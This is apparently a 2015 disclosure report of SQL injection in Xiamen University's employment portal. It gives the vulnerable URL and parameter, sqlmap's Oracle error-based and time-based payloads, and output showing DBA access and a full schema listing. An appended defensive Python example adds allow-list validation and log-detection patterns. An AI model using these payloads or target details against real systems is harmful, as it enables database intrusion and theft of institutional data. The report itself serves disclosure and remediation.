2015-12-14: Details sent to the vendor, awaiting vendor handling
2015-12-14: Vendor has confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and domain experts
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public

As the title says.
0x01 Vulnerability description
The Xiamen University Graduate Employment Guidance Center site has a SQL injection in which the database user holds DBA privileges, so the impact is severe.
0x02 Vulnerable address
http://jy.xmu.edu.cn/
0x03 Vulnerability details
http://jy.xmu.edu.cn/detach.portal?.pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82
Injectable parameter: bulletinId
0x04 Exploitation tool
sqlmap
0x04 Test results
sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Place: GET
Parameter: bulletinId
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: .pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82' AND 2388=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(104)||CHR(115)||CHR(105)||CHR(113)||(SELECT (CASE WHEN (2388=2388) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(116)||CHR(118)||CHR(115)||CHR(113)||CHR(62))) FROM DUAL) AND 'ZkjA'='ZkjA

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: .pmn=view&action=bulletinBrowser&.ia=false&.pen=pe5882&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82' AND 7818=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(116)||CHR(83)||CHR(65),5) AND 'kEuf'='kEuf
---
[14:28:21] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle

The output shows the database user has DBA privileges:
[14:29:28] [INFO] testing if current user is DBA
[14:29:29] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
All databases (schemas) on the server:
available databases [53]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] GCAMPUS
[*] GJREPORT
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] REPORT
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TS_PORTAL
[*] TSMSYS
[*] USR_BIEE_LIB
[*] USR_BISTAR
[*] USR_CCS_XMU
[*] USR_CSS
[*] USR_GGZXC
[*] USR_GZYQ
[*] USR_HR
[*] USR_HU
[*] USR_JY
[*] USR_JY_MH
[*] USR_JY_NEW
[*] USR_LX
[*] USR_MSG_XMU
[*] USR_OA
[*] USR_PHOTO
[*] USR_RS
[*] USR_RS_TZB
[*] USR_SR_XMU
[*] USR_SRNEW_DATA
[*] USR_SRNEW_FJ
[*] USR_SRNEW_KYRY
[*] USR_SRNEW_LK
[*] USR_SRNEW_WK
[*] USR_TB
[*] USR_TBFW
[*] USR_URP
[*] USR_XG
[*] USR_XSZHFW
[*] USR_XXZX
[*] USR_XY
[*] USR_YX
[*] USR_ZC
[*] USR_ZCGL
[*] USR_ZHFW
[*] WMSYS
[*] XDB
Row counts for the tables of one arbitrarily chosen database:
Database: SYSTEM
+---------------------------+---------+
| Table                     | Entries |
+---------------------------+---------+
| HELP                      | 978     |
| LOGSTDBY$SKIP_SUPPORT     | 104     |
| MVIEW$_ADV_PARAMETERS     | 40      |
| REPCAT$_OBJECT_TYPES      | 28      |
| AQ$_QUEUES                | 23      |
| REPCAT$_RESOLUTION_METHOD | 19      |
| AQ$_QUEUE_TABLES          | 12      |
| AQ$_INTERNET_AGENTS       | 3       |
| REPCAT$_TEMPLATE_STATUS   | 3       |
| AQ$_INTERNET_AGENT_PRIVS  | 2       |
| REPCAT$_AUDIT_ATTRIBUTE   | 2       |
| REPCAT$_TEMPLATE_TYPES    | 2       |
| DEF$_DESTINATION          | 1       |
+---------------------------+---------+
A large amount of information could be obtained this way; no further testing was done.

Fix: filter the affected parameter.
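Both sqlmap payloads above reach the database only because bulletinId is accepted as free text. As an added example (not part of the original report or the site's code), the following Python shows the two defensive checks a maintainer would want: an allow-list that accepts bulletinId only as a single canonical UUID, which is the format of the legitimate value on the page, and a log-review pass that flags requests whose bulletinId carries the Oracle constructs visible in the sqlmap output (CHR()|| string building, XMLType(), DBMS_PIPE.RECEIVE_MESSAGE()). The access-log lines and the request path are constructed for the example.

```python
import re
import uuid
from urllib.parse import urlsplit, parse_qs

# Oracle constructs that appear in the sqlmap payloads reported above.
ORACLE_MARKERS = (
    re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I),         # CHR(n)||CHR(n) string building
    re.compile(r"\bXMLType\s*\(", re.I),                      # error-based extraction via XMLType
    re.compile(r"\bDBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),   # time-based blind delay
    re.compile(r"\bFROM\s+DUAL\b", re.I),
)

def is_valid_bulletin_id(value):
    """Allow-list check: bulletinId must be exactly one canonical UUID (assumption
    based on the legitimate value shown in the report)."""
    try:
        return str(uuid.UUID(value)) == value.lower()
    except (ValueError, AttributeError, TypeError):
        return False

def classify_request(url):
    """Return 'ok', 'invalid' or 'injection' for one request URL."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)  # parse_qs URL-decodes
    for value in query.get("bulletinId", []):
        if is_valid_bulletin_id(value):
            continue
        if any(m.search(value) for m in ORACLE_MARKERS):
            return "injection"
        return "invalid"  # not a UUID, but no Oracle marker: reject, log as malformed
    return "ok"

def scan_access_log(lines):
    """Yield (status, url) for every request line of an Apache-style access log."""
    for line in lines:
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if m:
            yield classify_request(m.group(1)), m.group(1)

# Constructed sample log lines: a legitimate request, the time-based payload
# from the report (URL-encoded as a browser or sqlmap would send it), and a malformed id.
LOG_LINES = [
    '10.0.0.5 - - [14/Dec/2015:14:28:21 +0800] "GET /detach.portal?.pmn=view&action=bulletinBrowser&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [14/Dec/2015:14:28:22 +0800] "GET /detach.portal?.pmn=view&action=bulletinBrowser&bulletinId=e2467c3e-2906-11e4-a51e-dba799bccc82%27%20AND%207818%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%28104%29%7C%7CCHR%28116%29%2C5%29%20AND%20%27kEuf%27%3D%27kEuf HTTP/1.1" 500 310',
    '10.0.0.5 - - [14/Dec/2015:14:28:23 +0800] "GET /detach.portal?.pmn=view&action=bulletinBrowser&bulletinId=123 HTTP/1.1" 200 210',
]

if __name__ == "__main__":
    for status, url in scan_access_log(LOG_LINES):
        print(status, url)
```

The allow-list check belongs in the servlet before the value is placed in a bound parameter of a prepared statement; the log scan is for finding earlier probing in existing access logs.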
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-14 10:36
The responsible unit has been notified to handle it.
None for now.